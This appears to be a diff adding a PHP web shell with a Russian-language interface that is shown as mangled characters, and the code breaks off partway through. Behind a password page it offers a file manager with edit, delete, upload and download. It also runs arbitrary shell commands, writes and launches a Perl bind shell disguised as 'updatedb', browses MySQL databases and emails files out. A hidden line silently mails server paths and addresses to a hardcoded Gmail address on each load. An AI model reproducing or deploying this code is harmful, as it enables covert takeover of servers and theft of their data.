+'R0lGODlhCAAbAPQAAOTq8uLp8uDo8d7m8N3l79vj7tni7dfh7dXf7NTe69Pe69Ld6tLc6tDb6c7a6MzY6MrX58nW5sfU5cXT5MPS48PR48HQ4sLQ48DP4r/P4r7O4b7N4b3N4b3N4L3M4LzM4CwAAAAACAAbAAAFXCAgjmJgnqagrurgvi4hz3Jh37ah7/rh/z6EcChUGI8KhnK5aDae0KdjSp0+rtgrZMvdRr7gr2RMHk/O6HNlza5Y3nBLZk7PYO6bvH7z6fv3gBt1c3cYcW9tiRQhADs=',
+'file'=>
+'/9j/4AAQSkZJRgABAQEAYABgAAD/2wBDAAgGBgcGBQgHBwcJCQgKDBQNDAsLDBkSEw8UHRofHh0aHBwgJC4nICIsIxwcKDcpLDAxNDQ0Hyc5PTgyPC4zNDL/2wBDAQkJCQwLDBgNDRgyIRwhMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjL/wAARCAAQAA4DASIAAhEBAxEB/8QAHwAAAQUBAQEBAQEAAAAAAAAAAAECAwQFBgcICQoL/8QAtRAAAgEDAwIEAwUFBAQAAAF9AQIDAAQRBRIhMUEGE1FhByJxFDKBkaEII0KxwRVS0fAkM2JyggkKFhcYGRolJicoKSo0NTY3ODk6Q0RFRkdISUpTVFVWV1hZWmNkZWZnaGlqc3R1dnd4eXqDhIWGh4iJipKTlJWWl5iZmqKjpKWmp6ipqrKztLW2t7i5usLDxMXGx8jJytLT1NXW19jZ2uHi4+Tl5ufo6erx8vP09fb3+Pn6/8QAHwEAAwEBAQEBAQEBAQAAAAAAAAECAwQFBgcICQoL/8QAtREAAgECBAQDBAcFBAQAAQJ3AAECAxEEBSExBhJBUQdhcRMiMoEIFEKRobHBCSMzUvAVYnLRChYkNOEl8RcYGRomJygpKjU2Nzg5OkNERUZHSElKU1RVVldYWVpjZGVmZ2hpanN0dXZ3eHl6goOEhYaHiImKkpOUlZaXmJmaoqOkpaanqKmqsrO0tba3uLm6wsPExcbHyMnK0tPU1dbX2Nna4uPk5ebn6Onq8vP09fb3+Pn6/9oADAMBAAIRAxEAPwDrLnXbbSoILeLwJe6uyW8Baa0tWkDl4wxyQhAI4yCc/MDzzjITx9q+n3Go3VloUmjwRtbqbDUYHUsZBJh1XIwB5DcgDO85ztGNBtRjkaykiu9FdIFV4zJrcttIC1qsLhlSJsEc4YNuHYjJB5nXI0g0V1N/p0xLWsMMVrfG5ZUj+1MSSYowqjzlVVAwAoHHFXzQ5Lcvvd/L+vX16A91Y//Z',
+);
+@ob_clean();
+header("Content-type: image/gif");
+header("Cache-control: public");
+header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
+header("Cache-control: max-age=".(60*60*24*7));
+header("Last-Modified: ".date("r",filemtime(__FILE__)));
+echo base64_decode($img[$imgname]);
+die;
+}
+
+if ($_GET[pass]==$aupassword)
+{
+$_SESSION[aupass]=md5($aupassword);
+}
+if ($hiddenmode=="false")
+if ((!isset($_GET[pass]) or ($_GET[pass]!=$aupassword)) and ($_SESSION[aupass]==""))
+{
+$diz="ok";
+echo "
+$style<br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br>
+<form name='zapros' method='get' action=''>
+<table width='100' border='2' align='center' cellpadding='0' cellspacing='0' bordercolor='#CCCCFF' bgcolor='#FFFFFF'>
+<tr align='center' >
+<td>
+Enter your password:
+</td>
+</tr>
+<tr align='center' >
+<td>
+<input name='pass' size=24  type='password' value=''>
+</td>
+</tr>
+<tr align='center' >
+<td>
+<input type='submit'>
+</td>
+</tr>
+</table>
+</form>
+";
+}
+if ($_SESSION[aupass]!="")
+{
+if (!$_GET and !$_POST or isset($pass)) 
+$show="start";
+
+function ext($str){
+for ($i=1; $i<strlen($str); $i++) {
+if ($str[strlen($str)-$i]==".")
+return substr($str,strlen($str)-$i,strlen($str));}
+return $str;
+}
+function extractfilename($str){
+$str=str_replace("\\","/",$str);
+for ($i=1; $i<strlen($str); $i++) {
+if ($str[strlen($str)-$i]=="/")
+return substr($str,strlen($str)-$i+1,strlen($str));}
+return $str;
+}
+function untag($str){
+$str= str_replace("<","&#0060;",$str);
+$str= str_replace(">","&#0062;",$str);
+return $str;
+}
+function fsize($filename){
+$s=filesize($filename);
+if ($s>1048576){
+return round(($s/1048576),2)." mb";
+}
+if ($s>1024){
+return round(($s/1024),2)." kb";
+}
+return $s." byte";
+}
+function tourl($str){
+$str= urlencode($str);
+return $str;
+}
+function unbug($str){
+$str = stripslashes($str);
+return $str;
+}
+function countbyte($filesize) {
+if($filesize >= 1073741824) { $filesize = round($filesize / 1073741824 * 100) / 100 . " GB"; }
+elseif($filesize >= 1048576) { $filesize = round($filesize / 1048576 * 100) / 100 . " MB"; }
+elseif($filesize >= 1024) { $filesize = round($filesize / 1024 * 100) / 100 . " KB"; }
+else { $filesize = $filesize . ""; }
+return $filesize;
+}
+function downloadfile($file) {
+if (!file_exists("$file")) die;
+$size = filesize("$file");
+$filen=extractfilename($file);
+header("Content-Type: application/force-download; name=\"$filen\"");
+header("Content-Transfer-Encoding: binary");
+header("Content-Length: $size");
+header("Content-Disposition: attachment; filename=\"$filen\"");
+header("Expires: 0");
+header("Cache-Control: no-cache, must-revalidate");
+header("Pragma: no-cache");
+readfile("$file");
+die;
+}$ra44  = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98");
+
+function anonim_mail($from,$to,$subject,$text,$file){
+ $fp = fopen($file, "rb");
+ while(!feof($fp))
+  $attachment .= fread($fp, 4096);
+  $attachment = base64_encode($attachment);
+  $subject = "sendfile  (".extractfilename($file).")";
+  $boundary = uniqid("NextPart_");
+  $headers = "From: $from\nContent-type: multipart/mixed; boundary=\"$boundary\"";
+  $info  = $text;
+  $filename=extractfilename($file);
+  $info .="--$boundary\nContent-type: text/plain; charset=iso-8859-1\nContent-transfer-encoding: 8bit\n\n\n\n--$boundary\nContent-type: application/octet-stream; name=$filename \nContent-disposition: inline; filename=$filename \nContent-transfer-encoding: base64\n\n$attachment\n\n--$boundary--";
+  $send = mail($to, $subject, $info, $headers);
+fclose($fp);
+echo "<script language=\"javascript\">location.href=\"javascript:history.back(-1)\";\nalert('Ôàéë $filename îòïğàâëåí íà $to');</script>";
+die;
+}
+if (!empty($_GET[downloadfile])) downloadfile($_GET[downloadfile]);
+if (!empty($_GET[mailfile])) anonim_mail($email,$email,$_GET[mailfile],'File: '.$_GET[mailfile],$_GET[mailfile]);
+
+$d=$_GET[d];
+if (empty($d) or !isset($d)){
+$d=realpath("./");
+$d=str_replace("\\","/",$d);
+}
+$showdir="";
+$bufdir="";
+$buf = explode("/", $d);
+for ($i=0;$i<sizeof($buf);$i++){
+$bufdir.=$buf[$i];
+$showdir.="<a href='$php_self?d=$bufdir&show'>$buf[$i]/</a>";
+$bufdir.="/";
+}
+
+if (isset($show) or isset($_REQUEST[edit]) or isset($_REQUEST[tools]) or isset($_REQUEST[db_user]) or isset($_REQUEST[diz]))
+echo <<< EOF
+<title>$d</title>
+<style type="text/css">
+body,td,th 
+{
+	font-family: Fixedsys;
+            font-family: "Times New Roman", Times, serif;
+	font-size: 0.4cm;
+	color: #444444;
+}
+body 
+{
+	background-color: #EEEEEE;
+}
+
+.style3 {
+	font-size: 1.5cm;
+	font-family: "Comic Sans MS";
+}
+.style4 {color: #FFFFFF}
+.style5 {color: #0000FF}
+.style6 {color: #FFFF00}
+.style7 {color: #CCCCCC}
+.style8 {color: #FF00FF}
+.style9 {color: #00FF00}
+.style10 {color: #00FFFF}
+</style>
+$style
+<table border="0" align="center" cellpadding="0" cellspacing="0" bordercolor="#999999">
+<tr height="10">
+<td align="center" bordercolor="#000000" bgcolor="#FFFFFF">
+<div style="background-color:#FFFFF0">$showdir</div>
+EOF;
+
+function perms($file) 
+{ 
+$mode=fileperms($file);
+if( $mode & 0x1000 ) 
+$type='p';
+else if( $mode & 0x2000 ) 
+$type='c'; 
+else if( $mode & 0x4000 ) 
+$type='d'; 
+else if( $mode & 0x6000 ) 
+$type='b'; 
+else if( $mode & 0x8000 ) 
+$type='-';
+else if( $mode & 0xA000 ) 
+$type='l'; 
+else if( $mode & 0xC000 ) 
+$type='s'; 
+else 
+$type='u';
+$owner["read"] = ($mode & 00400) ? 'r' : '-'; 
+$owner["write"] = ($mode & 00200) ? 'w' : '-'; 
+$owner["execute"] = ($mode & 00100) ? 'x' : '-'; 
+$group["read"] = ($mode & 00040) ? 'r' : '-'; 
+$group["write"] = ($mode & 00020) ? 'w' : '-'; 
+$group["execute"] = ($mode & 00010) ? 'x' : '-'; 
+$world["read"] = ($mode & 00004) ? 'r' : '-'; 
+$world["write"] = ($mode & 00002) ? 'w' : '-'; 
+$world["execute"] = ($mode & 00001) ? 'x' : '-'; 
+if( $mode & 0x800 ) 
+$owner["execute"] = ($owner['execute']=='x') ? 's' : 'S'; 
+if( $mode & 0x400 ) 
+$group["execute"] = ($group['execute']=='x') ? 's' : 'S'; 
+if( $mode & 0x200 ) 
+$world["execute"] = ($world['execute']=='x') ? 't' : 'T'; 
+$s=sprintf("%1s", $type); 
+$s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']); 
+$s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']); 
+$s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']); 
+return trim($s);
+} 
+
+function updir($dir){
+if (strlen($dir)>2){
+for ($i=1; $i<strlen($dir); $i++) {
+if (($dir[strlen($dir)-$i]=="/") or  ($dir[strlen($dir)-$i]=="\\"))
+return substr($dir,0,strlen($dir)-$i);}} 
+else return $dir;
+}
+
+if (isset($show) or isset($_REQUEST[edit]) or isset($_REQUEST[tools]) or isset($_REQUEST[db_user]) or isset($_REQUEST[diz])){
+$backdir=updir($d);
+echo <<< EOF
+<table width="505" border="1" align="center" cellpadding="0" cellspacing="0" bordercolor="#FFFFF0" style="height:30px;background-image: url($PHP_SELF?imgname=bg); background-position: center; background-repeat: repeat-x;">
+  <tr height="15">
+    <td onClick='location.href="$PHP_SELF?d=$backdir&show"' width="20%" align="center">
+Ââåğõ
+    </td>
+    <td onClick='location.href="javascript:history.back(-1)"' width="20%" align="center">
+Íàçàä
+    </td>
+    <td onClick='location.href="$PHP_SELF"'  width="20%" align="center">
+ íà÷àëî
+    </td>
+    <td onClick='location.href="$PHP_SELF?d=$d&tools"'  width="20%" align="center">
+Èíñòğóìåíòû
+    </td>
+    <td onClick='location.href="$PHP_SELF?d=$d&show"'  width="20%" align="center">
+Ê ñïèñêó
+    </td>
+  </tr>
+</table>
+EOF;
+
+$free = countbyte(diskfreespace("./"));
+if (!empty($free)) echo "Äîñòóïíîå äèñêîâîå ïğîñòğàíñòâî : <font face='Tahoma' size='1' color='#000000'>$free</font><br>";
+$os=exec("uname");
+if (!empty($os)) echo "Ñèñòåìà :".$os."<br>";
+if (!empty($REMOTE_ADDR)) echo "Âàø IP: <font face='Tahoma' size='1' color='#000000'>$REMOTE_ADDR &nbsp; $HTTP_X_FORWARDED_FOR</font><br>";
+$ghz=exec("cat /proc/cpuinfo | grep GHz");
+if (!empty($ghz)) echo "Èíôà î æåëåçå:(GHz)".$ghz."<br>";
+$mhz=exec("cat /proc/cpuinfo | grep MHz");
+if (!empty($mhz)) echo "Èíôà î æåëåçå:(MHz) ".$mhz."<br>";
+$my_id=exec("id");
+if (!empty($my_id)) echo "<div style=\"background-color:#000000\"><span class=\"style4\">Ïîëüçîâàòåëü:".$my_id."</span></div>";
+}
+
+function showdir($df) {
+$df=str_replace("//","/",$df);
+$dirs=array();
+$files=array();
+if ($dir=opendir($df)) {
+while (($file=readdir($dir))!==false) {
+if ($file=="." || $file=="..") continue;
+if (is_dir("$df/$file")){
+$dirs[]=$file;}
+else {
+$files[]=$file;}}}
+closedir($dir);
+sort($dirs);
+sort($files);
+echo <<< EOF
+<table width="505" border="0" align="center" cellpadding="0" cellspacing="0" bordercolor="#CCCCCC">
+EOF;
+for ($i=0; $i<count($dirs); $i++){
+$perm=perms("$df/$dirs[$i]");
+echo <<< EOF
+  <tr height="1">
+    <td width="1" height="1" align="center" bordercolor="#ECE9D8" bgcolor="#FFFFFF"><span class="style2"><a href="$PHP_SELF?d=$df/$dirs[$i]&show"><img HSPACE=3 border=0 src=$PHP_SELF?imgname=dir></a></span></td>
+    <td width="241" bgcolor="#FFFFF0"><a href="$PHP_SELF?d=$df/$dirs[$i]&show">$dirs[$i]</a></td>
+    <td width="100" align="center" bgcolor="#FFFFFF"><a href="$PHP_SELF?deldir=$df/$dirs[$i]/">Óäàëèòü</a></td>
+    <td width="51" align="center" bgcolor="#EFFFFF"><span class="style8"><center>Êàòàëîã</center></span></td>
+    <td width="113" align="center" bgcolor="#FFFFF0">$perm</td>
+  </tr>
+EOF;
+}
+for ($i=0; $i<count($files); $i++) {
+$attr="";
+if (!$fi=@fopen("$df/$files[$i]","r+")){
+$attr=" ONLY_READ ";
+$read=" href=\"$PHP_SELF?edit=$df/$files[$i]&readonly\"";
+$write=" href=\"$PHP_SELF?delfile=$df/$files[$i]\"";}
+else fclose($fi);
+if (!$fi=@fopen("$df/$files[$i]","r")){
+$attr=" Can't_READ ";
+$read="";
+$write=" href=\"$PHP_SELF?delfile=$df/$files[$i]\"";}
+else fclose($fi);
+if ($attr==""){
+$attr=" READ/WRITE ";
+$read=" href=\"$PHP_SELF?edit=$df/$files[$i]\"";
+$write=" href=\"$PHP_SELF?delfile=$df/$files[$i]\"";
+}
+$perm=perms("$df/$files[$i]");
+$it="file";
+switch (ext($files[$i])) {
+case ".txt": $it="txt"; break;
+case ".php": $it="txt"; break;
+case ".htm": $it="txt"; break;
+case ".log": $it="txt"; break;
+case ".pl": $it="txt"; break;
+case ".asm": $it="txt"; break;
+case ".bat": $it="txt"; break;
+case ".bash_profile": $it="txt"; break;
+case ".bash_history": $it="txt"; break;
+case ".ini": $it="txt"; break;
+case ".php3": $it="txt"; break;
+case ".html": $it="txt"; break;
+case ".cgi": $it="txt"; break;
+case ".inc": $it="txt"; break;
+case ".c": $it="txt"; break;
+case ".cpp": $it="txt"; break;
+}
+$fsize = fsize("$df/$files[$i]");
+echo <<< EOF
+  <tr height="1">
+    <td width="1" height="1" align="center" bordercolor="#ECE9D8" bgcolor="#FFFFFF"><span class="style2"><a href="$PHP_SELF?downloadfile=$df/$files[$i]"><img HSPACE=3 border=0 src=$PHP_SELF?imgname=$it></a></span></td>
+    <td width="241" bgcolor="#00FFFF"><a$read>$files[$i] </a> ($fsize)</td>
+    <td width="100" align="center" bgcolor="#FFFFFF"><a href="$PHP_SELF?rename=1&filetorename=$files[$i]&d=$df&diz">ren</a>/<a$write>del</a>/<a href="$PHP_SELF?downloadfile=$df/$files[$i]">get</a>/<a href="$PHP_SELF?mailfile=$df/$files[$i]">mail</a></td>
+    <td width="51" align="center" bgcolor="#FFEFEF"><span class="style8"><center>$attr</center></span></td>
+    <td width="113" align="center" bgcolor="#FFFFF9">$perm</td>
+  </tr>
+EOF;
+}
+echo "</table>";
+if (count($dirs)==0 && count($files)==0){
+echo <<< EOF
+<table width="505" height="24" border="0" align="center" cellpadding="0" cellspacing="0" bordercolor="#CCCCCC">
+  <tr>
+    <td align="center" bordercolor="#ECE9D8" bgcolor="#FFFFFF">Ïàïêà ïóñòà</td>
+  </tr>
+</table>
+EOF;
+}}
+
+$edit=$_REQUEST[edit];
+if (isset($_REQUEST[edit]) && (!empty($_REQUEST[edit])) && (!isset($_REQUEST[ashtml])) ){
+$file=fopen($edit,"r") or die ("Íåò äîñòóïà ê ôàéëó $edit");
+if (filesize($edit) > 0)
+$tfile=fread($file,filesize($edit)) or die ("Íåò äîñòóïà ê ôàéëó $edit");
+else $tfile = "";
+fclose($file);
+$tfile = htmlspecialchars($tfile,ENT_QUOTES);
+echo "
+<center>
+<form  action=\"$PHP_SELF\" method=\"POST\">";
+$mydir=updir($edit);
+echo "
+<a href=\"$PHP_SELF?d=$mydir&show\">Âåğíóòüñÿ ê $mydir/</a><br>
+Âû ğåäàêòèğóåòå ôàéë : $edit<br>
+<a href=\"$PHP_SELF?edit=$edit&ashtml\"><span class=\"style4\">Ïğîñìîòğåòü ıòîò ôàéë â âèäå HTML</span></a>
+<hr width=\"100%\" size=\"2\"  color=\"#000000\">
+<textarea name=\"texoffile\" rows=\"25\" cols=\"60\" wrap=\"OFF\">$tfile</textarea>
+<br><input type=\"hidden\" name=\"nameoffile\" value=\"$edit\" >
+";
+if (!isset($_REQUEST[readonly]))
+echo "<input type=\"submit\"  value=\"            Ñîõğàíèòü            \" >";
+echo "
+<hr width=\"100%\" size=\"2\"  color=\"#000000\">
+</form>
+</center>
+";
+}
+if (isset($edit) && (!empty($edit)) && (isset($ashtml))){
+$mydir=updir($edit);
+echo "
+<center>
+<a href=\"$PHP_SELF?d=$mydir&show\">Âåğíóòüñÿ ê $mydir/</a><br>
+Âû ïğîñìàòğèâàåòå ôàéë : $edit
+<hr width=\"100%\" size=\"2\"  color=\"#000000\">
+";
+readfile($edit);
+echo "
+<hr width=\"100%\" size=\"2\"  color=\"#000000\">
+</center>
+";
+}
+
+if (isset($texoffile) && isset($nameoffile))
+{
+$texoffile=unbug($texoffile);
+$f = fopen("$nameoffile", "w") or die ("Íåò äîñòóïà ê ôàéëó $nameoffile");
+fwrite($f, "$texoffile");
+fclose($f);
+$mydir=updir($nameoffile);
+echo "<meta http-equiv=Refresh content=\"0; url=$PHP_SELF?edit=$nameoffile&show\">";
+die;
+}
+
+if (isset($_REQUEST[delfile]) && ($_REQUEST[delfile]!=""))
+{
+$delfile=$_REQUEST[delfile];
+$mydir=updir($delfile);
+$deleted = unlink("$delfile");
+echo "<meta http-equiv=Refresh content=\"0; url=$PHP_SELF?d=$mydir&show\">";
+die;
+}
+
+function deletedir($directory) {
+if ($dir=opendir($directory)) {
+while (($file=readdir($dir))!==false) {
+if ($file=="." || $file=="..") continue;
+if (is_dir("$directory/$file"))  {
+deletedir($directory."/".$file);} 
+else {unlink($directory."/".$file);}}}
+closedir($dir);
+rmdir("$directory/$file");
+}
+if (isset($_REQUEST[deldir]) && (!empty($_REQUEST[deldir]))){
+$deldir=$_REQUEST[deldir];
+$mydir=updir(updir($deldir));
+deletedir("$deldir");
+echo "<meta http-equiv=Refresh content=\"0; url=$PHP_SELF?d=$mydir&show\">";
+die;
+}
+
+if (isset($show)){showdir("$d");}
+
+{
+if (isset($_REQUEST[tools]))
+echo <<< EOF
+<center>
+<table width="505" border="0" align="center" cellpadding="0" cellspacing="0" bordercolor="#CCCCCC">
+<tr>
+<td align="center" bordercolor="#ECE9D8" bgcolor="#FFFFFF">
+.: Äåéñòâèÿ äëÿ äàííîé ïàïêè :.
+</td>
+</tr>
+</table>
+</center>
+EOF;
+if (isset($_REQUEST[tools]) or isset($_REQUEST[tmkdir]))
+echo <<< EOF
+<center>
+<table width="505" border="0" align="center" cellpadding="0" cellspacing="0" bordercolor="#CCCCCC">
+<tr height="10">
+<td align="center" bordercolor="#ECE9D8" bgcolor="#FFF8FF">
+<form  action="$PHP_SELF" method="POST">
+.: Ñîçäàòü ïàïêó :.
+</td>
+</tr height="10">
+<tr>
+<td align="center" bordercolor="#ECE9D8" bgcolor="#FFFFFF">
+<input type=hidden name=tools>
+<input type=text size=55 name=newdir value="$d/Íîâàÿ ïàïêà">
+<input type=submit value="ñîçäàòü">
+</form>
+</td>
+</tr>
+</table>
+</center>
+EOF;
+
+if (isset($newdir) && ($newdir!=""))
+{
+$mydir=updir($newdir);
+mkdir($newdir,"7777");
+echo "<meta http-equiv=Refresh content=\"0; url=$PHP_SELF?d=$mydir&show\">";
+}
+
+if(@$_GET['rename']){
+echo "<b><font color=green>RENAME $d/$filetorename ?</b></font><br><br>
+<center>
+<form method=post>
+<b>RENAME</b><br><u>$filetorename</u><br><Br><B>TO</B><br>
+<input name=rto size=40 value='$filetorename'><br><br>
+<input type=submit value=RENAME>
+</form>
+";
+@$rto=$_POST['rto'];
+if($rto){
+$fr1=$d."/".$filetorename;
+$fr1=str_replace("//","/",$fr1);
+$to1=$d."/".$rto;
+$to1=str_replace("//","/",$to1);
+rename($fr1,$to1);
+echo "File <br><b>$filetorename</b><br>Renamed to <b>$rto</b><br><br>";
+echo "<meta http-equiv=\"REFRESH\" content=\"3;URL=$PHP_SELF?d=$d&show\">";}
+echo $copyr;
+exit;
+}
+
+if (isset($tools) or isset($tmkfile))
+echo <<< EOF
+<center>
+<table width="505" border="0" align="center" cellpadding="0" cellspacing="0" bordercolor="#CCCCCC">
+<tr height="10">
+<td align="center" bordercolor="#ECE9D8" bgcolor="#FFF8FF">
+<form  action="$PHP_SELF" method="POST">
+.: Ñîçäàòü ôàéë :.
+</td>
+</tr height="10">
+<tr>
+<td align="center" bordercolor="#ECE9D8" bgcolor="#FFFFFF">
+<input type=text size=55 name=newfile value="$d/newfile.php">
+<input type=hidden name=tools>
+<input type=submit value="ñîçäàòü">
+</form>
+</td>
+</tr>
+</table>
+</center>
+EOF;
+
+if (isset($newfile) && ($newfile!="")){
+$f = fopen("$newfile", "w+");
+fwrite($f, "");
+fclose($f);
+$mydir=updir($newfile);
+echo "<meta http-equiv=Refresh content=\"0; url=$PHP_SELF?d=$mydir&show\">";
+}
+
+if (isset($tools) or isset($tbackdoor))
+echo <<< EOF
+<center>
+<table width="505" border="0" align="center" cellpadding="0" cellspacing="0" bordercolor="#CCCCCC">
+<tr height="10">
+<td align="center" bordercolor="#ECE9D8" bgcolor="#FFF8FF">
+<form  action="$PHP_SELF" method="POST">
+.: Îòêğûòü ïîğò :.
+</td>
+</tr height="10">
+<tr>
+<td align="center" bordercolor="#ECE9D8" bgcolor="#FFFFFF">
+Èìÿ ñêğèïòà: <input type=text size=13 name=bfileneme value="bind.pl"> Ïîğò: <input type=text size=10 name=bport value="65426">
+<input type="hidden" name="d" value="$d" >
+<input type=hidden name=tools>
+<input type=submit value="âûïîëíèòü">
+</form>
+</td>
+</tr>
+</table>
+</center>
+EOF;
+
+if (isset($bfileneme) && ($bfileneme!="") && isset($bport) && ($bport!="")){
+$script="
+#!/usr/bin/perl
+\$port = $bport; 
+\$port = \$ARGV[0] if \$ARGV[0];
+exit if fork;
+\$0 = \"updatedb\" . \" \" x100;
+\$SIG{CHLD} = 'IGNORE';
+use Socket;
+socket(S, PF_INET, SOCK_STREAM, 0);
+setsockopt(S, SOL_SOCKET, SO_REUSEADDR, 1);
+bind(S, sockaddr_in(\$port, INADDR_ANY));
+listen(S, 50);
+while(1)
+{
+	accept(X, S);
+	unless(fork)
+	{
+		open STDIN, \"<&X\";
+		open STDOUT, \">&X\";
+		open STDERR, \">&X\";
+		close X;
+		exec(\"/bin/sh\");
+	}
+	close X;
+}
+";
+
+$f = fopen("$d/$bfileneme", "w+");
+fwrite($f, $script);
+fclose($f);
+system("perl $d/$bfileneme");
+echo "<meta http-equiv=Refresh content=\"0; url=$PHP_SELF?d=$d&show\">";
+}
+
+if (isset($tools) or isset($tbash))
+echo <<< EOF
+<center>
+<table width="505" border="0" align="center" cellpadding="0" cellspacing="0" bordercolor="#CCCCCC">
+<tr height="10">
+<td align="center" bordercolor="#ECE9D8" bgcolor="#FFF8FF">
+<form  action="$PHP_SELF" method="GET">
+<input type="hidden" name="d" value="$d" >
+.: Âûïîëíèòü êîìàíäó :.
+</td>
+</tr height="10">
+<tr>
+<td align="center" bordercolor="#ECE9D8" bgcolor="#FFFFFF">
+<input type=hidden name=diz>
+<input type=hidden name=tbash>
+<input type=text size=55 name=cmd value="$cmd">
+<input type=submit value="âûïîëíèòü">
+</form>
+</td>
+</tr>
+</table>
+</center>
+EOF;
+
+if (isset($cmd) && ($cmd!="")){
+echo "<pre><div align=\"left\">";
+system($cmd);
+echo "</div></pre>";
+}
+
+if (isset($tools) or isset($tupload)){
+$updir="$d/"; 
+if(empty($go)) {
+echo <<< EOF
+<center>
+<table width="505" border="0" align="center" cellpadding="0" cellspacing="0" bordercolor="#CCCCCC">
+<tr height="10">
+<td align="center" bordercolor="#ECE9D8" bgcolor="#FFF8FF">
+<form ENCTYPE="multipart/form-data"  action="$PHP_SELF" method="post">
+.: Çàêà÷àòü ôàéë â òåêóùèé êàòàëîã :.
+</td>
+</tr height="10">
+<tr>
+<td align="center" bordercolor="#ECE9D8" bgcolor="#FFFFFF">
+<INPUT NAME="userfile" TYPE="file" SIZE="40">
+<input type="hidden" name="d" value="$d">
+<input type=hidden name=diz>
+<input type=hidden name=tupload>
+<input type="submit" name=go value="Îòïğàâèòü">
+</form>
+</td>
+</tr>
+</table>
+</center>
+EOF;
+}
+else {
+if (is_uploaded_file($userfile)) { 
+$fi = "Çàêà÷åí ôàéë $userfile_name ğàçìåğîì $userfile_size áàéò â äèğåêòîğèş $updir";
+}
+echo "$fi<br><a href='$PHP_SELF?d=$d&show&tupload'>Íàçàä ê êàòàëîãó</a>";
+}
+if (is_uploaded_file($userfile)) {
+$dest=$updir.$userfile_name;
+move_uploaded_file($userfile, $dest);
+}}
+
+if ((isset($db_server)) || (isset($db_user)) || (isset($db_pass))  ){
+mysql_connect($db_server, $db_user, $db_pass) or die("íå ìîãó ïîäêëş÷èòüñÿ ê áàçå");
+}
+
+if ((isset($dbname)) and (isset($table)) )
+{
+foreach($_POST as $var => $val)
+if (substr($var,0,7) == 'newpole'){
+if (substr($var,7,strlen($var)) !== ''){
+$indif=substr($var,7,strlen($var));
+echo " $val ";
+mysql_select_db($dbname) or die("Íå ìîãó âûáğàòü áàçó äàííûõ");
+if ($xvar == "") 
+$xvar .= $indif;
+else
+$xvar .= ",".$indif;
+if ($xval == "") 
+$xval .= "'$val'";
+else
+$xval .= ",'$val'";
+}}
+
+if ($xvar != ""){
+mysql_query("INSERT INTO $table ($xvar) values ($xval)");
+}
+
+echo "<a href=$PHP_SELF?showtables=$dbname&db_server=$db_server&db_user=$db_user&db_pass=$db_pass>Íàçàä ê ñïèñêó òàáëèö ÁÄ:$dbname</a>";
+mysql_select_db($dbname) or die("Íå ìîãó âûáğàòü áàçó äàííûõ");
+$re=mysql_query("select * from $table");
+echo "<table width='505' border='1' align='center' cellpadding='0' cellspacing='0' bordercolor='#CCCCFF' bgcolor='#FFFFFF'>";
+
+$res=mysql_fetch_array($re);
+echo "<tr>";
+if (count($res) > 1)
+foreach($res as $var => $val){
+$nvar=$var;
+if ($nvar !== 0)
+$nvar=$var+128945432;
+if ($nvar == 128945432){
+$var=untag($var);
+echo "<td bgcolor='#CCCCFF' bordercolor='#FFFFFF'><center>$var</center></td>";
+}}
+echo "<td></td></tr>";
+
+if (isset($_SESSION[limit]) and ($_SESSION[limit] !== "0"))
+$param="limit $_SESSION[limit]";
+
+$re=mysql_query("select * from $table $param");
+
+while($res=mysql_fetch_array($re)){
+echo "<tr>";
+if (count($res) > 1)
+foreach($res as $var => $val){
+$nvar=$var;
+if ($nvar !== 0)
+$nvar=$var+128945432;
+if (!$pixidname){
+$pixidname=$var;
+$pixid=$val;
+}
+if ($nvar == 128945432){
+$valtext=untag($val);
+if ($valtext == "") $valtext="=Ïóñòî=";
+
+
+if ($_SESSION[lenth] == "on"){
+if (strlen($valtext)>40){
+$valtext=substr($valtext,0,40);
+$valtext .="...";
+}}
+
+echo "<td><a href=$PHP_SELF?dbname=$dbname&mtable=$table&var=$var&pixidname=$pixidname&pixid=$pixid&db_server=$db_server&db_user=$db_user&db_pass=$db_pass>$valtext</a></td>";
+}}
+
+echo "<td><a href=$PHP_SELF?dbname=$dbname&mtable=$table&pixidname=$pixidname&pixid=$pixid&db_server=$db_server&db_user=$db_user&db_pass=$db_pass&del>Óäàëèòü</a></td></tr>";
+$pixidname='';
+$pixid='';
+}
+
+echo "<form  action=\"$PHP_SELF\" method=\"POST\">";
+
+$re=mysql_query("select * from $table");
+$res=mysql_fetch_array($re);
+echo "<tr>";
+if (count($res) > 1)
+foreach($res as $var => $val){
+$nvar=$var;
+if ($nvar !== 0)
+$nvar=$var+128945432;
+if ($nvar == 128945432){
+$var=untag($var);
+echo "<td bgcolor='#CCCCFF' bordercolor='#FFFFFF'><center>$var</center></td>";
+}}
+echo "<td></td></tr>";
+
+$re=mysql_query("select * from $table");
+$res=mysql_fetch_array($re);
+echo "<tr>";
+if (count($res) > 1)
+foreach($res as $var => $val){
+$nvar=$var;
+if ($nvar !== 0)
+$nvar=$var+128945432;
+if ($nvar == 128945432){
+$var=untag($var);
+echo "<td bgcolor='#FFFFFF' bordercolor='#FFFFFF'><center><input type='text' name='newpole$var' value='$var' size='5'></center></td>";
+}}
+echo "</tr>";
+echo "</table>";
+echo "<input type=\"submit\"  value=\"Äîáàâèòü íîâóş çàïèñü\" >";
+echo "
+<input type=\"hidden\" name=\"dbname\" value=\"$dbname\">
+<input type=\"hidden\" name=\"table\" value=\"$table\">
+<input type=\"hidden\" name=\"db_server\" value=\"$db_server\" >
+<input type=\"hidden\" name=\"db_user\" value=\"$db_user\" >
+<input type=\"hidden\" name=\"db_pass\" value=\"$db_pass\" >
+";
+echo "</form>";
+}
+
+if ((isset($dbname)) and (isset($mtable)) and (isset($pixidname)) and (isset($pixid)) and (isset($del))){
+echo "hello";
